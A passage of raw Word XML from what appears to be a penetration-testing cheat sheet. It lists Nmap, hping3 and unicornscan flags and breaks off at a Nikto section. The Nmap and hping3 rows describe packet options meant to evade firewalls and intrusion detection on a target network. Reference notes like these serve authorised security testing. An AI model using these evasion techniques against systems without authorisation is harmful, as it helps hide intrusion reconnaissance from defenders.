            </w:r>
          </w:p>
          <w:p w14:paraId="0D8E472B" w14:textId="5FDC5E75" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r w:rsidRPr="003F76A2">
              <w:t xml:space="preserve">Nmap uses </w:t>
            </w:r>
            <w:r w:rsidRPr="003F76A2">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--data </w:t>
            </w:r>
            <w:r w:rsidRPr="003F76A2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>0xdeadbeef</w:t>
            </w:r>
            <w:r w:rsidRPr="003F76A2">
              <w:t xml:space="preserve"> to send the binary data (o’s and 1’s) as payloads in the sent packets to scan beyond firewalls.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="264CFBCA" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r w:rsidRPr="003F76A2">
              <w:t xml:space="preserve">Nmap uses </w:t>
            </w:r>
            <w:r w:rsidRPr="003F76A2">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--badsum </w:t>
            </w:r>
            <w:r w:rsidRPr="003F76A2">
              <w:t>to send the packets with bad or bogus TCP/UPD checksums to the intended target to avoid certain firewall rulesets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C2FDC" w14:paraId="195932FD" w14:textId="77777777" w:rsidTr="005C2FDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="080F0C73" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t>44.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="445D53CC" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRPr="00F4574C" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>hping3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4B647F8B" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t>Hping3 is a scriptable program that uses the TCL language, whereby packets can be received and sent via a binary or string representation describing the packets.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="697DC771" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t>Here, we will use Hping3 to create custom UDP and TCP packets to evade the IDS/firewall in the target network. Here are some useful flags:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E749CE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--udp</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Specifies using UDP</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E749CE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--rand-source</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Enables random source mode</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E749CE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--data </w:t>
            </w:r>
            <w:r w:rsidRPr="00E749CE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Specifies packet size</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E749CE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-S</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>TCP SYN/stealth request</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C2FDC" w14:paraId="364B69F9" w14:textId="77777777" w:rsidTr="005C2FDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0E05CDD5" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0FB62785" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5A16C333" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRPr="000C65EE" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60B9CDEE" w14:textId="77777777" w:rsidR="005D321C" w:rsidRDefault="005D321C"/>
    <w:p w14:paraId="74329B18" w14:textId="242098E7" w:rsidR="005D321C" w:rsidRDefault="00D2620F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0B334ECE" wp14:editId="42FA954A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1982470</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>149414230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7040880" cy="673989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40880" cy="6739890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005D321C">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ADA00B" w14:textId="32C97F42" w:rsidR="005D321C" w:rsidRDefault="005D321C" w:rsidP="005D321C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r w:rsidR="00B521D7" w:rsidRPr="003E4B7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unicornscan</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:tblpY="698"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2399"/>
        <w:gridCol w:w="8017"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B6617D" w14:paraId="00279E07" w14:textId="77777777" w:rsidTr="00B521D7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="27BD203F" w14:textId="462D892D" w:rsidR="005D321C" w:rsidRDefault="005D321C" w:rsidP="00567016">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1D8AE422" w14:textId="7F8A38AC" w:rsidR="005D321C" w:rsidRPr="00264844" w:rsidRDefault="00B521D7" w:rsidP="00567016">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00264844">
              <w:t>unicornscan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E578F76" w14:textId="3864A64E" w:rsidR="005D321C" w:rsidRPr="00264844" w:rsidRDefault="00264844" w:rsidP="00567016">
            <w:r w:rsidRPr="00264844">
              <w:t>Unicornscan is a Linux-based command line-oriented network information-gathering and reconnaissance tool. It is an asynchronous TCP and UDP port scanner and banner grabber that enables you to discover open ports, services, TTL values, etc. running on the target machine. In Unicornscan, the OS of the target machine can be identified by observing the TTL values in the acquired scan result.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B521D7" w14:paraId="671E6B5F" w14:textId="77777777" w:rsidTr="00264844">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="210CD0C9" w14:textId="46EA4028" w:rsidR="00B521D7" w:rsidRDefault="00264844" w:rsidP="00567016">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="03B26C3D" w14:textId="78532A6B" w:rsidR="00B521D7" w:rsidRDefault="00264844" w:rsidP="00567016">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>unicornscan</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00EF1B7E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>unicornscan</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1B7E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> isn’t installed by default</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6E3D2790" w14:textId="77777777" w:rsidR="00B521D7" w:rsidRDefault="00264844" w:rsidP="00567016">
            <w:r w:rsidRPr="00264844">
              <w:t>To install unicornscan on Kali Linux, simply enter:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00264844">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sud</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidRPr="00264844">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="00264844">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="00264844">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>unicornscan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00264844">
              <w:t>There are various flags available also:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F82F20">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-I</w:t>
            </w:r>
            <w:r w:rsidRPr="00F82F20">
              <w:tab/>
              <w:t>Immediately show results</w:t>
            </w:r>
            <w:r w:rsidR="00F82F20">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Capital i)</w:t>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-m </w:t>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>L</w:t>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:tab/>
              <w:t xml:space="preserve">scanning mode: use one of these in replacement for the </w:t>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>L</w:t>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:t>…</w:t>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>U</w:t>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:t xml:space="preserve"> - UDP</w:t>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:t xml:space="preserve"> - TCP</w:t>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:t xml:space="preserve"> - ARP</w:t>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>sf</w:t>
            </w:r>
            <w:r w:rsidR="00F82F20" w:rsidRPr="00F82F20">
              <w:t xml:space="preserve"> - TCP Connect</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B7EB8E5" w14:textId="77777777" w:rsidR="00F82F20" w:rsidRDefault="00F82F20" w:rsidP="00567016">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F82F20">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidRPr="00F82F20">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Specifiy ports to scan</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EEF22FE" w14:textId="45E0792C" w:rsidR="00F82F20" w:rsidRPr="00F52BA1" w:rsidRDefault="00F82F20" w:rsidP="00567016">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F82F20">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-r </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F82F20">
              <w:t xml:space="preserve">Specifiy rate of desired packets per second for sender to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F82F20">
              <w:t>us</w:t>
            </w:r>
            <w:r w:rsidR="003E4B7A">
              <w:t>q</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D321C" w14:paraId="4DAB4AD4" w14:textId="77777777" w:rsidTr="00567016">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0AE62546" w14:textId="77777777" w:rsidR="005D321C" w:rsidRDefault="005D321C" w:rsidP="00567016"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3A30A0C9" w14:textId="77777777" w:rsidR="005D321C" w:rsidRDefault="005D321C" w:rsidP="00567016">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="76950344" w14:textId="77777777" w:rsidR="005D321C" w:rsidRPr="000C65EE" w:rsidRDefault="005D321C" w:rsidP="00567016"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B9248DA" w14:textId="2A28A444" w:rsidR="00004A4A" w:rsidRDefault="00004A4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486C6D4" w14:textId="13014A09" w:rsidR="0038011E" w:rsidRDefault="0038011E" w:rsidP="0038011E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:r w:rsidR="00625824">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | skipfish</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:tblpY="698"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2393"/>
        <w:gridCol w:w="8023"/>
      </w:tblGrid>
      <w:tr w:rsidR="009C1273" w14:paraId="230A1D10" w14:textId="77777777" w:rsidTr="009C1273">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4F1F3534" w14:textId="1A1BFE1D" w:rsidR="009C1273" w:rsidRDefault="009C1273" w:rsidP="0043739D">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7B48DA1D" w14:textId="02457ED4" w:rsidR="009C1273" w:rsidRDefault="009C1273" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nikto</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Nikto</w:t>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is already installed on Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6D888BBD" w14:textId="77777777" w:rsidR="009C1273" w:rsidRPr="004E53E1" w:rsidRDefault="009C1273" w:rsidP="00AA20B4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E53E1">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS A WEBSITE ASSOCIATED WITH THE IP ADDRESS. OTHERWISE, SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13B54018" w14:textId="77777777" w:rsidR="009C1273" w:rsidRDefault="009C1273" w:rsidP="0043739D">
            <w:r w:rsidRPr="00AA20B4">
